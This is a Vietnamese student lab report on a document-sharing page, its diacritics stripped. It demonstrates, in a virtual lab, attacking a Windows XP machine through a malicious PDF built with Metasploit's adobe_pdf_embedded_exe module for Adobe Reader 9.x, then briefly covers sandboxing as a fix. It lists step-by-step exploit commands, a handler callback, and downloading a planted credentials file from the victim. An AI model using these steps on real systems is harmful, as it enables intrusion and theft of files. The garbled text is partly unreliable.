hướng dẫn tấn công máy victim bằng file pdf qua lỗi của adobe_reader 9.x
Citation preview
1. ti : Nghin Cu chc nng backtrack kim tra an ninh mng Sinh vin
thc hin : Trn Bch Th GVHD : V Thng
2. Ni Dung bi bo co - Hng dn tn cng mc victim bng file pdf qua
li ca adobe_reader 9.x trn nn win xp - Hng dn cch khc phc s c khi
my tnh mc phi li trn Cc cng c h tr lm bi - 2 my o: My backtrack :
chun b 1 file pdf My xp : c ci t phn mm adobe_reader 9.x , phn mm
sandbox khc phc li ( my xp s c coi l my victim m chng ta s tn cng )
3. Mc lc Table of Contents Phn I : Hng dn tn cng my victim
.....................................................................................................1
Phn II : Hng Dn cch khc phc
...........................................................................................................7
4. Sinh vin thc hin :Trn Bch Th GVHD :V Thng 1Hng dn tn cng my
victim bng file pdf Phn I : Hng dn tn cng my victim - G lnh
msfconsole khi ng metaploit - V y l li trong mang LAN nn yu cu ip
my backtrack phi cng lp vi IP my victim - G lnh ifconfig xem IP 5.
Sinh vin thc hin :Trn Bch Th GVHD :V Thng 2Hng dn tn cng my victim
bng file pdf - Ta dng lnh ipconfig xem IP my victim - Sau ping a ch
IP my backtrack xem n thy nhay hay khng - Sau khi metaploit khi ng
xong , g tip cu lnh : Use
exploit/windows/fileformat/adobe_pdf_embedded_exe ( chn li m ta s
dng tn cng ) - G tip : show options 6. Sinh vin thc hin :Trn Bch Th
GVHD :V Thng 3Hng dn tn cng my victim bng file pdf - Sau khi show
options , n s a ra cc thng tin v li m chng ta dng - Set filename :
ngha l t tn cho file cha m c - Set infilename : chuyn i t file pdf
m chng ta chun b t trc - Set payload : kiu tn cng - Set Lhost : g
ip my mnh vo ( y l 192.168.183.128 ) - Dng lnh exploit thc thi 7.
Sinh vin thc hin :Trn Bch Th GVHD :V Thng 4Hng dn tn cng my victim
bng file pdf - cp /root/.msf4/local/hack.pdf /root/Desktop : cu lnh
ny s to ra 1 file pdf cha m c c tn l hack.pdf , v n c t ngay ngoi
Desktop - use exploit/multi/handler : to 1 phin lng nghe - Set li
lhost ( vi IP ging IP m chng ta st trn ) ri sau exploit l xong - Ch
cn gi file cha m c n my nn nhn , khi nn nhn m file n s yu cu save
li , ri hi c mun open hay ko , ch cn nhn open th my s b tn cng 8.
Sinh vin thc hin :Trn Bch Th GVHD :V Thng 5Hng dn tn cng my victim
bng file pdf - My backtrack xm nhp thnh cng , v n gi 1 file (
752128 byte ) n my victim - Ta dng lnh : cd C:/ ( lnh ny s di chuyn
n C ca my victim ) - Dng lnh : ls ( lit k tt c cc tp tin trong C )
9. Sinh vin thc hin :Trn Bch Th GVHD :V Thng 6Hng dn tn cng my
victim bng file pdf - Trn my victim ta vo C to 1 file tn
taikhoan.txt ( ni dung trong file l id : tho pass:123456 ) - Trn my
backtrack dng lnh ls lit k li th thy file taikhoan.txt - Dng lnh :
download C:/taikhoan.txt /root/Desktop/ ( cu lnh ny s download file
taikhoan.txt t C ca my victim v t trn Desktop ca chng ta ) 10. Sinh
vin thc hin :Trn Bch Th GVHD :V Thng 7Hng dn tn cng my victim bng
file pdf Phn II : Hng Dn cch khc phc - Ti phn mm sandbox v my - Sau
ta tin hnh ci t , v y l giao din ca phn mm sandbox 11. Sinh vin thc
hin :Trn Bch Th GVHD :V Thng 8Hng dn tn cng my victim bng file pdf
- Nu bn nghi ng file no khng ng tin cy th bn b vo trong , y ta s
chy file hack.pdf khi ny - y ch m file hack.pdf , nhng n t ng m thm
1 s ci khc - My backtrack vn xm nhp vo my victim bnh thng - Dng lnh
: cd C:/ ( di chuyn n C ca my victim ) - Sau th dng lnh : upload
/root/Desktop/file.pdf C:/ ( ta s send 1 file c tn file.pdf n my
victim ) 12. Sinh vin thc hin :Trn Bch Th GVHD :V Thng 9Hng dn tn
cng my victim bng file pdf - Cu lnh vn chy OK nhng bn my victim th
khng thy file.pdf m backtrack gi qua - Trn my backtrack ta dng lnh
: ls - N lit k tt c cc th mc trong C lun c file.pdf m khi ny gi mc
d trn my victim th khng nhn c
